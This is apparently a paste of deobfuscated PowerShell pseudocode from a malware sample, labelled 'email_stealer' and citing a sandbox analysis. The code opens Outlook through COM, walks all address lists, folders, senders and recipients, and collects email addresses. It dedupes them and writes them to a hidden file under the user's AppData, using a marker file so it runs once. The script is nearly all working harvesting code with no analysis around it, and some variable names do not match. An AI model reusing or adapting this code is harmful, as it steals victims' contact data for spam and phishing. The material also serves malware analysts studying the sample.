email_stealer

1. # deobfuscated pseudocode from l.ps1 - https://app.any.run/tasks/9433b851-34b9-462b-895e-26a8402b9985
2.  
3. Add-Type -assembly Microsoft.Office.Interop.Outlook
4. $NEW_OUTLOOK = New-Object -comobject Outlook.Application
5. $MAPI = $NEW_OUTLOOK.GetNameSpace(MAPI)
6. $COLLECTION = [System.Collections.ArrayList]@()
7.  
8. function CHECK_VALID($STOLEN_ADDRESS)
9. {
10. $EMAIL_REGEX = "^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$"
11. if ($STOLEN_ADDRESS -match $EMAIL_REGEX) {
12. return $true
13. }
14. return $false
15. }
16.  
17. function COLLECT_INFO($STOLEN_ADDRESS) {
18. if ($STOLEN_ADDRESS) {
19. $KNOWN_ADDRESS = $false
20. $STOLEN_ADDRESS = $STOLEN_ADDRESS.ToLower()
21. if ($STOLEN_ADDRESS.StartsWith("'") -And $STOLEN_ADDRESS.EndsWith("'")) {
22. $STOLEN_ADDRESS = $STOLEN_ADDRESS.Substring(1, $STOLEN_ADDRESS.Length - 2)
23. }
24. if (CHECK_VALID($STOLEN_ADDRESS)) {
25. for($CT_ADDRESSES = 0;$CT_ADDRESSES -lt $OUTLOOK_EXPORT.Count;$CT_ADDRESSES++) {
26. if ($OUTLOOK_EXPORT[$CT_ADDRESSES] -eq $STOLEN_ADDRESS) {
27. $KNOWN_ADDRESS = $true
28. break
29. }
30. }
31. if (-Not $KNOWN_ADDRESS) {
32. $FINAL_EXPORT = $OUTLOOK_EXPORT.Add($STOLEN_ADDRESS)
33. }
34. }
35. }
36. }
37.  
38. function STEAL_ADDRESS_LISTS {
39. $CT_ADDRESS_LIST = $MAPI.AddressLists
40. for($CT_ADDRESS = 1;$CT_ADDRESS -le $CT_ADDRESS_LIST.Count;$CT_ADDRESS++) {
41. $CT_ADDRESS_ENTRY = $CT_ADDRESS_LIST.Item($CT_ADDRESS).AddressEntries
42. for($OL_ADDRESS = 1;$OL_ADDRESS -le $CT_ADDRESS_ENTRY.Count;$OL_ADDRESS++) {
43. $CURR_ADDRESS = $CT_ADDRESS_ENTRY.Item($OL_ADDRESS)
44. $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
45. $STOLEN_ADDRESS = ""
46. if ($CURR_ADDRESS_TYPE -eq 10) {
47. $STOLEN_ADDRESS = $CURR_ADDRESS.Address
48. } elseif (($CURR_ADDRESS_TYPE -eq 3) -Or ($CURR_ADDRESS_TYPE -eq 1) -Or ($CURR_ADDRESS_TYPE -eq 4) -Or ($CURR_ADDRESS_TYPE -eq 2) -Or ($CURR_ADDRESS_TYPE -eq 5) -Or ($CURR_ADDRESS_TYPE -eq 0)) {
49. $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
50. }
51. COLLECT_INFO($STOLEN_ADDRESS)
52. }
53. }
54. }
55.  
56. function STEAL_EMAIL_ADDRESS($MAPI.Folders) {
57. for($CT_FOLDERS = 1;$CT_FOLDERS -le $MAPI.Folders.Count;$CT_FOLDERS++) {
58. $CURR_FOLDER = $MAPI.Folders.Item($CT_FOLDERS)
59. $CURR_ITEMS = $CURR_FOLDER.Items
60. for($OL_ITEM = 1;$OL_ITEM -le $CURR_ITEMS.Count;$OL_ITEM++) {
61. $INDIV_EMAIL = $CURR_ITEMS.Item($OL_ITEM)
62. $RECIPIENTS = $INDIV_EMAIL.Recipients
63. for($CURR_RECIPIENT = 1;$CURR_RECIPIENT -le $RECIPIENTS.Count;$CURR_RECIPIENT++) {
64. $CURR_RECIPIENT_DETAILS = $RECIPIENTS.Item($CURR_RECIPIENT)
65. $CURR_ADDRESS = $CURR_RECIPIENT_DETAILS.AddressEntry
66. $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
67. $STOLEN_ADDRESS = "";
68. if ($CURR_ADDRESS_TYPE -eq 0) {
69. $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
70. } elseif (($CURR_ADDRESS_TYPE -eq 30) -Or ($CURR_ADDRESS_TYPE -eq 10)) {
71. $STOLEN_ADDRESS = $CURR_ADDRESS.Address
72. }
73. COLLECT_INFO($STOLEN_ADDRESS)
74. }
75. $CURR_ADDRESS = $INDIV_EMAIL.Sender
76. $CURR_ADDRESS_TYPE = $CURR_ADDRESS.AddressEntryUserType
77. $STOLEN_ADDRESS = "";
78. if ($CURR_ADDRESS_TYPE -eq 0) {
79. $STOLEN_ADDRESS = $CURR_ADDRESS.GetExchangeUser().PrimarySmtpAddress
80. } elseif (($CURR_ADDRESS_TYPE -eq 30) -Or ($CURR_ADDRESS_TYPE -eq 10)) {
81. $STOLEN_ADDRESS = $CURR_ADDRESS.Address
82. }
83. COLLECT_INFO($STOLEN_ADDRESS)
84. }
85. STEAL_EMAIL_ADDRESS($CURR_FOLDER.Folders)
86. }
87. }
88.  
89. function GET_LIST_AND_EMAIL() {
90. STEAL_ADDRESS_LISTS
91. STEAL_EMAIL_ADDRESS($MAPI.Folders)
92.  
93. Add-Content $env:APPDATA\Microsoft\.Outlook $OUTLOOK_EXPORT
94. }
95.  
96. function STEAL_EMAIL_INFO() {
97. $FILE_EXISTS = [System.IO.File]::Exists($CHECK_FILE)
98. if (-Not $FILE_EXISTS) {
99. "" | sc $CHECK_FILE
100. GET_LIST_AND_EMAIL
101. }
102. }
103.  
104. STEAL_EMAIL_INFO